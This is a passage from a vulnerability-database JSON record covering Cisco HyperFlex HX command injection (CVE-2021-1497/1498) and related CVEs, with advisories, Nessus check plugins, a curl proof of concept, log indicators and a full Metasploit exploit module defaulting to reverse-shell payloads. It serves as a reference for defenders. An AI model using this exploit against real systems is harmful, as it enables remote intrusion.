[CVE-2021-22502](<https://nvd.nist.gov/vuln/detail/CVE-2021-22502>) (Remote code execution flaw in Micro Focus Operation Bridge Reporter)\n * [CVE-2021-22506](<https://nvd.nist.gov/vuln/detail/CVE-2021-22506>) (Information Leakage vulnerability in Micro Focus Access Manager)\n\nUnit 42's report had previously uncovered as many as six known and three unknown security flaws that were exploited in the attacks, counting those targeted at SonicWall SSL-VPNs, D-Link DNS-320 firewalls, Netis WF2419 wireless routers, and Netgear ProSAFE Plus switches.\n\nTo avoid any potential compromise, users are recommended to update their router firmware to the latest version.\n\n\"It is clear that threat actors keep an eye on all disclosed vulnerabilities. 
Whenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T09:27:00", "type": "thn", "title": "Hackers Exploiting New Auth Bypass Bug Affecting Millions of Arcadyan Routers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", "CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "modified": "2021-08-11T03:38:35", "id": "THN:EE1B4CCBFEA2E4D18964A709469ABD37", "href": "https://thehackernews.com/2021/08/hackers-exploiting-new-auth-bypass-bug.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2022-12-22T12:15:04", "description": "Multiple vulnerabilities in Cisco 
SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application.\n\nFor more information about these vulnerabilities, see the Details [\"#details\"] section of this advisory.\n\nCisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ\"]", "cvss3": {}, "published": "2021-05-05T16:00:00", "type": "cisco", "title": "Cisco SD-WAN vManage Software Vulnerabilities", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-1275", "CVE-2021-1468", "CVE-2021-1505", "CVE-2021-1506", "CVE-2021-1508"], "modified": "2021-05-05T16:00:00", "id": "CISCO-SA-SD-WAN-VMANAGE-4TBYNNHZ", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ", "cvss": {"score": 9.8, "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}, {"lastseen": "2022-12-22T12:10:25", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.\n\nFor more information about these vulnerabilities, see the Details [\"#details\"] section of this advisory.\n\nCisco has released software updates that address these vulnerabilities. 
There are no workarounds that address these vulnerabilities.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR\"]", "cvss3": {}, "published": "2021-05-05T16:00:00", "type": "cisco", "title": "Cisco HyperFlex HX Command Injection Vulnerabilities", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2022-12-15T22:19:48", "id": "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR", "cvss": {"score": 9.8, "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}], "nessus": [{"lastseen": "2023-01-11T14:48:29", "description": "According to its self-reported version, Cisco SD-WAN Viptela Software is affected by multiple vulnerabilities that allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. 
\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-10T00:00:00", "type": "nessus", "title": "Cisco SD-WAN vManage Software Vulnerabilities (cisco-sa-sd-wan-vmanage-4TbynnhZ)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1275", "CVE-2021-1468", "CVE-2021-1505", "CVE-2021-1506", "CVE-2021-1508"], "modified": "2021-05-17T00:00:00", "cpe": ["cpe:/a:cisco:sd-wan_vmanage", "cpe:/o:cisco:sd-wan_firmware"], "id": "CISCO-SA-SD-WAN-VMANAGE-4TBYNNHZ.NASL", "href": "https://www.tenable.com/plugins/nessus/149363", "sourceData": "#TRUSTED\n#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149363);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/05/17\");\n\n script_cve_id(\n \"CVE-2021-1275\",\n \"CVE-2021-1468\",\n \"CVE-2021-1505\",\n 
\"CVE-2021-1506\",\n \"CVE-2021-1508\"\n );\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu28360\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu28390\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu28402\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu28454\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-sd-wan-vmanage-4TbynnhZ\");\n\n script_name(english:\"Cisco SD-WAN vManage Software Vulnerabilities (cisco-sa-sd-wan-vmanage-4TbynnhZ)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, Cisco SD-WAN Viptela Software is affected by multiple vulnerabilities that\nallow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an\nauthenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. 
\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?769d3f6f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu28360\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu28390\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu28402\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu28454\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug IDs CSCvu28360, CSCvu28390, CSCvu28402, CSCvu28454\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 862, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:sd-wan_vmanage\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:cisco:sd-wan_firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_vedge_detect.nbin\");\n script_require_keys(\"Cisco/Viptela/Version\");\n\n exit(0);\n}\n\ninclude('ccf.inc');\n\nvar product_info = cisco::get_product_info(name:'Cisco Viptela');\n\nif (tolower(product_info['model']) !~ \"vmanage\")\n audit(AUDIT_HOST_NOT, 'an affected model');\n\nvar vuln_ranges = [\n { 'min_ver' : '0.0', 'fix_ver' : '20.3.3' },\n { 'min_ver' : '20.4', 'fix_ver' : '20.4.1' },\n { 'min_ver' : '20.5', 'fix_ver' : '20.5.1' }\n];\n\nvar reporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'bug_id' , 'CSCvu28360, CSCvu28390, CSCvu28402, CSCvu28454',\n 'version' , product_info['version'],\n 'disable_caveat', TRUE\n);\n\ncisco::check_and_report(\n product_info:product_info,\n vuln_ranges:vuln_ranges,\n reporting:reporting\n);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T14:48:49", "description": "The version of Cisco HyperFlex HX installed on the remote host is affected by multiple command injection vulnerabilities. 
An unauthenticated, remote attacker can exploit these to execute arbitrary commands on an affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-26T00:00:00", "type": "nessus", "title": "Cisco HyperFlex HX Command Injection Direct Check (cisco-sa-hyperflex-rce-TjjNrkpR)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2022-11-30T00:00:00", "cpe": ["cpe:/a:cisco:hyperflex_hx-series_software"], "id": "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR-DC.NBIN", "href": "https://www.tenable.com/plugins/nessus/149979", "sourceData": "Binary data cisco-sa-hyperflex-rce-TjjNrkpR-dc.nbin", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:54", "description": "The version of Cisco HyperFlex HX installed on the remote host is affected by multiple command injection vulnerabilities. 
An unauthenticated, remote attacker can exploit these to execute arbitrary commands on an affected system.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-13T00:00:00", "type": "nessus", "title": "Cisco HyperFlex HX Command Injection Vulnerabilities (cisco-sa-hyperflex-rce-TjjNrkpR)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2022-01-21T00:00:00", "cpe": ["cpe:/a:cisco:hyperflex_hx-series_software"], "id": "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR.NASL", "href": "https://www.tenable.com/plugins/nessus/149454", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149454);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/21\");\n\n script_cve_id(\"CVE-2021-1497\", \"CVE-2021-1498\");\n script_xref(name:\"CISCO-BUG-ID\", 
value:\"CSCvx36014\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvx36019\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvx37435\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-hyperflex-rce-TjjNrkpR\");\n script_xref(name:\"IAVA\", value:\"2021-A-0237\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Cisco HyperFlex HX Command Injection Vulnerabilities (cisco-sa-hyperflex-rce-TjjNrkpR)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Cisco HyperFlex HX installed on the remote host is affected by multiple command injection \nvulnerabilities. An unauthenticated, remote attacker can exploit these to execute arbitrary commands on an affected \nsystem.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c9228075\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvx36014\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvx36019\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvx37435\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug IDs CSCvx36014, CSCvx36019, CSCvx37435\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1497\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Cisco HyperFlex HX Data Platform Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(78);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:hyperflex_hx-series_software\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_hyperflex_web_api_detect.nbin\");\n script_require_keys(\"Host/OS/Cisco_HyperFlex_web_API\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nvar port = get_http_port(default:80);\nvar app_info = vcf::get_app_info(app:'Cisco HyperFlex', port:port);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n {'fixed_version':'4.0.2e'}, \n {'min_version':'4.5.0', 'fixed_version':'4.5.2a'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info, \n constraints:constraints, \n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2021-07-24T10:24:58", "description": "# CVE-2021-1497 and/or CVE-2021-1498\n\nCommand injection in the `/storfs-asup` endpoint\u2019s `token` and `mode` parameters.\n\n## Patch\n\n```\n--- unpatched/web.xml\t2021-05-17 19:06:17.000000000 -0500\n+++ patched/web.xml\t2021-05-17 19:06:23.000000000 -0500\n@@ -69,17 +69,6 @@\n \t</servlet-mapping>\n\n \t<servlet>\n-\t\t<servlet-name>Springpath Storfs ASUP</servlet-name>\n-\t\t<servlet-class>com.storvisor.sysmgmt.service.StorfsAsup</servlet-class>\n-\t\t<load-on-startup>1</load-on-startup>\n-\t</servlet>\n-\n-\t<servlet-mapping>\n-\t\t<servlet-name>Springpath Storfs ASUP</servlet-name>\n-\t\t<url-pattern>/storfs-asup/*</url-pattern>\n-\t</servlet-mapping>\n-\n-\t<servlet>\n \t\t<servlet-name>Springpath Upgrade Image Upload Service</servlet-name>\n \t\t<servlet-class>com.storvisor.sysmgmt.service.StorvisorFileUploader</servlet-class>\n \t</servlet>\n```\n\n## Vulnerability\n\n```\n protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n String action = request.getParameter(\"action\");\n if (action == null) {\n String msg = \"Action for the servlet need be specified.\";\n writeErrorResponse(response, 
msg);\n return;\n }\n try {\n String token = request.getParameter(\"token\");\n StringBuilder cmd = new StringBuilder();\n cmd.append(\"exec /bin/storfs-asup \");\n cmd.append(token);\n String mode = request.getParameter(\"mode\");\n cmd.append(\" \");\n cmd.append(mode);\n cmd.append(\" > /dev/null\");\n logger.info(\"storfs-asup cmd to run : \" + cmd);\n ProcessBuilder pb = new ProcessBuilder(new String[] { \"/bin/bash\", \"-c\", cmd.toString() });\n logger.info(\"Starting the storfs-asup now: \");\n long startTime = System.currentTimeMillis();\n Process p = pb.start();\n InputStream errStream = p.getErrorStream();\n String errMsg = FileUtils.readToString(errStream);\n int exitCode = p.waitFor();\n long timeTaken = System.currentTimeMillis() - startTime;\n logger.info(\"storfs-asup command completed in (\" + timeTaken + \" ) milliseconds, with exit code (\" + exitCode + \") and error message: \" + errMsg);\n errStream.close();\n OutputStream outStream = p.getOutputStream();\n outStream.flush();\n outStream.close();\n if (exitCode != 0)\n throw new Exception(errMsg);\n } catch (IOException ex) {\n logger.error(\"Failed to generate asup: \" + ex);\n } catch (Exception ie) {\n logger.error(\"Failed to run the /bin/storfs-asup command.\");\n } finally {\n logger.info(\"Done executing asup command. 
\");\n }\n }\n```\n\n## PoC\n\n```\nwvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'\n* Trying 192.168.123.133...\n* TCP_NODELAY set\n* Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)\n> POST /storfs-asup HTTP/1.1\n> Host: 192.168.123.133\n> User-Agent: curl/7.64.1\n> Accept: */*\n> Content-Length: 28\n> Content-Type: application/x-www-form-urlencoded\n>\n* upload completely sent off: 28 out of 28 bytes\n< HTTP/1.1 200 OK\n< Server: nginx/1.8.1\n< Date: Tue, 18 May 2021 00:54:26 GMT\n< Content-Length: 0\n< Connection: keep-alive\n< Front-End-Https: on\n<\n* Connection #0 to host 192.168.123.133 left intact\n* Closing connection 0\nwvu@kharak:~$\n```\n\n## IOCs\n\n```\n==> /var/log/nginx/access.log <==\n192.168.123.1 - - [17/May/2021:17:54:26 -0700] \"POST /storfs-asup HTTP/1.1\" 200 0 \"-\" \"curl/7.64.1\"\n\n==> /var/log/springpath/stBootstrapGuiBackend.log <==\n2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null\n2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():64 - Starting the storfs-asup now:\n2021-05-18-00:54:26.017 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory\n2021-05-18-00:54:26.020 [tomcat-http-2] ERROR com.storvisor.sysmgmt.service.StorfsAsup.processRequest():89 - Failed to run the /bin/storfs-asup command.\n2021-05-18-00:54:26.020 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():91 - Done executing asup command.\n\n==> /var/log/tomcat7/catalina.out <==\n2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > 
/dev/null\n2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:64 - Starting the storfs-asup now:\n2021-05-18-00:54:26.017 INFO com.storvisor.sysmgmt.service.StorfsAsup:71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory\n2021-05-18-00:54:26.020 ERROR com.storvisor.sysmgmt.service.StorfsAsup:89 - Failed to run the /bin/storfs-asup command.\n2021-05-18-00:54:26.020 INFO com.storvisor.sysmgmt.service.StorfsAsup:91 - Done executing asup command.\n\n==> /var/log/tomcat7/localhost_access_log.2021-05-17.txt <==\n127.0.0.1 - - [17/May/2021:17:54:26 -0700] \"POST /storfs-asup HTTP/1.0\" 200 -\n```", "cvss3": {}, "published": "2021-05-20T00:00:00", "type": "seebug", "title": "Cisco HyperFlex HX Unauthorized Command Injection Vulnerability (CVE-2021-1497 CVE-2021-1498)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2021-05-20T00:00:00", "id": "SSV:99255", "href": "https://www.seebug.org/vuldb/ssvid-99255", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-06-04T16:21:33", "description": "", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "packetstorm", "title": "Cisco HyperFlex HX Data Platform Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2021-06-04T00:00:00", "id": "PACKETSTORM:162976", "href": "https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude 
Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Cisco HyperFlex HX Data Platform Command Execution', \n'Description' => %q{ \nThis module exploits an unauthenticated command injection in Cisco \nHyperFlex HX Data Platform's /storfs-asup endpoint to execute shell \ncommands as the Tomcat user. \n}, \n'Author' => [ \n'Nikita Abramov', # Discovery \n'Mikhail Klyuchnikov', # Discovery \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-1497'], # HyperFlex HX Data Platform Installer \n['CVE', '2021-1498'], # HyperFlex HX Data Platform \n['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR'], \n['URL', 'https://attackerkb.com/assessments/4f532147-b27b-4079-aed1-5cfdc402cf5c'], \n['URL', 'https://twitter.com/ptswarm/status/1390300625129201664'] \n], \n'DisclosureDate' => '2021-05-05', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, # Privesc left as an exercise for the reader \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \nregister_advanced_options([ \nOptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5]) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => %w[GET POST].sample, 
\n'uri' => normalize_uri(target_uri.path, 'storfs-asup') \n) \n \nreturn CheckCode::Unknown unless res \n \nunless res.code == 200 && \nres.body.include?('Action for the servlet need be specified.') \nreturn CheckCode::Safe \nend \n \nCheckCode::Vulnerable('Storfs ASUP servlet detected.') \nend \n \ndef exploit \nprint_status(\"Selected #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nprint_status(\"Executing command: #{cmd}\") \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'storfs-asup'), \n'vars_post' => { \n'action' => Faker::Hacker.verb, \n%w[token mode].sample => \"$(#{cmd})\" \n} \n}, datastore['CmdExecTimeout']) \n \nunless res \nprint_warning('Command execution timed out') \nreturn \nend \n \nunless res.code == 200 \nfail_with(Failure::PayloadFailed, 'Failed to execute command') \nend \n \nprint_good('Successfully executed command') \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162976/cisco_hyperflex_hx_data_platform_cmd_exec.rb.txt", "cvss": {"score": 10.0, "vector": 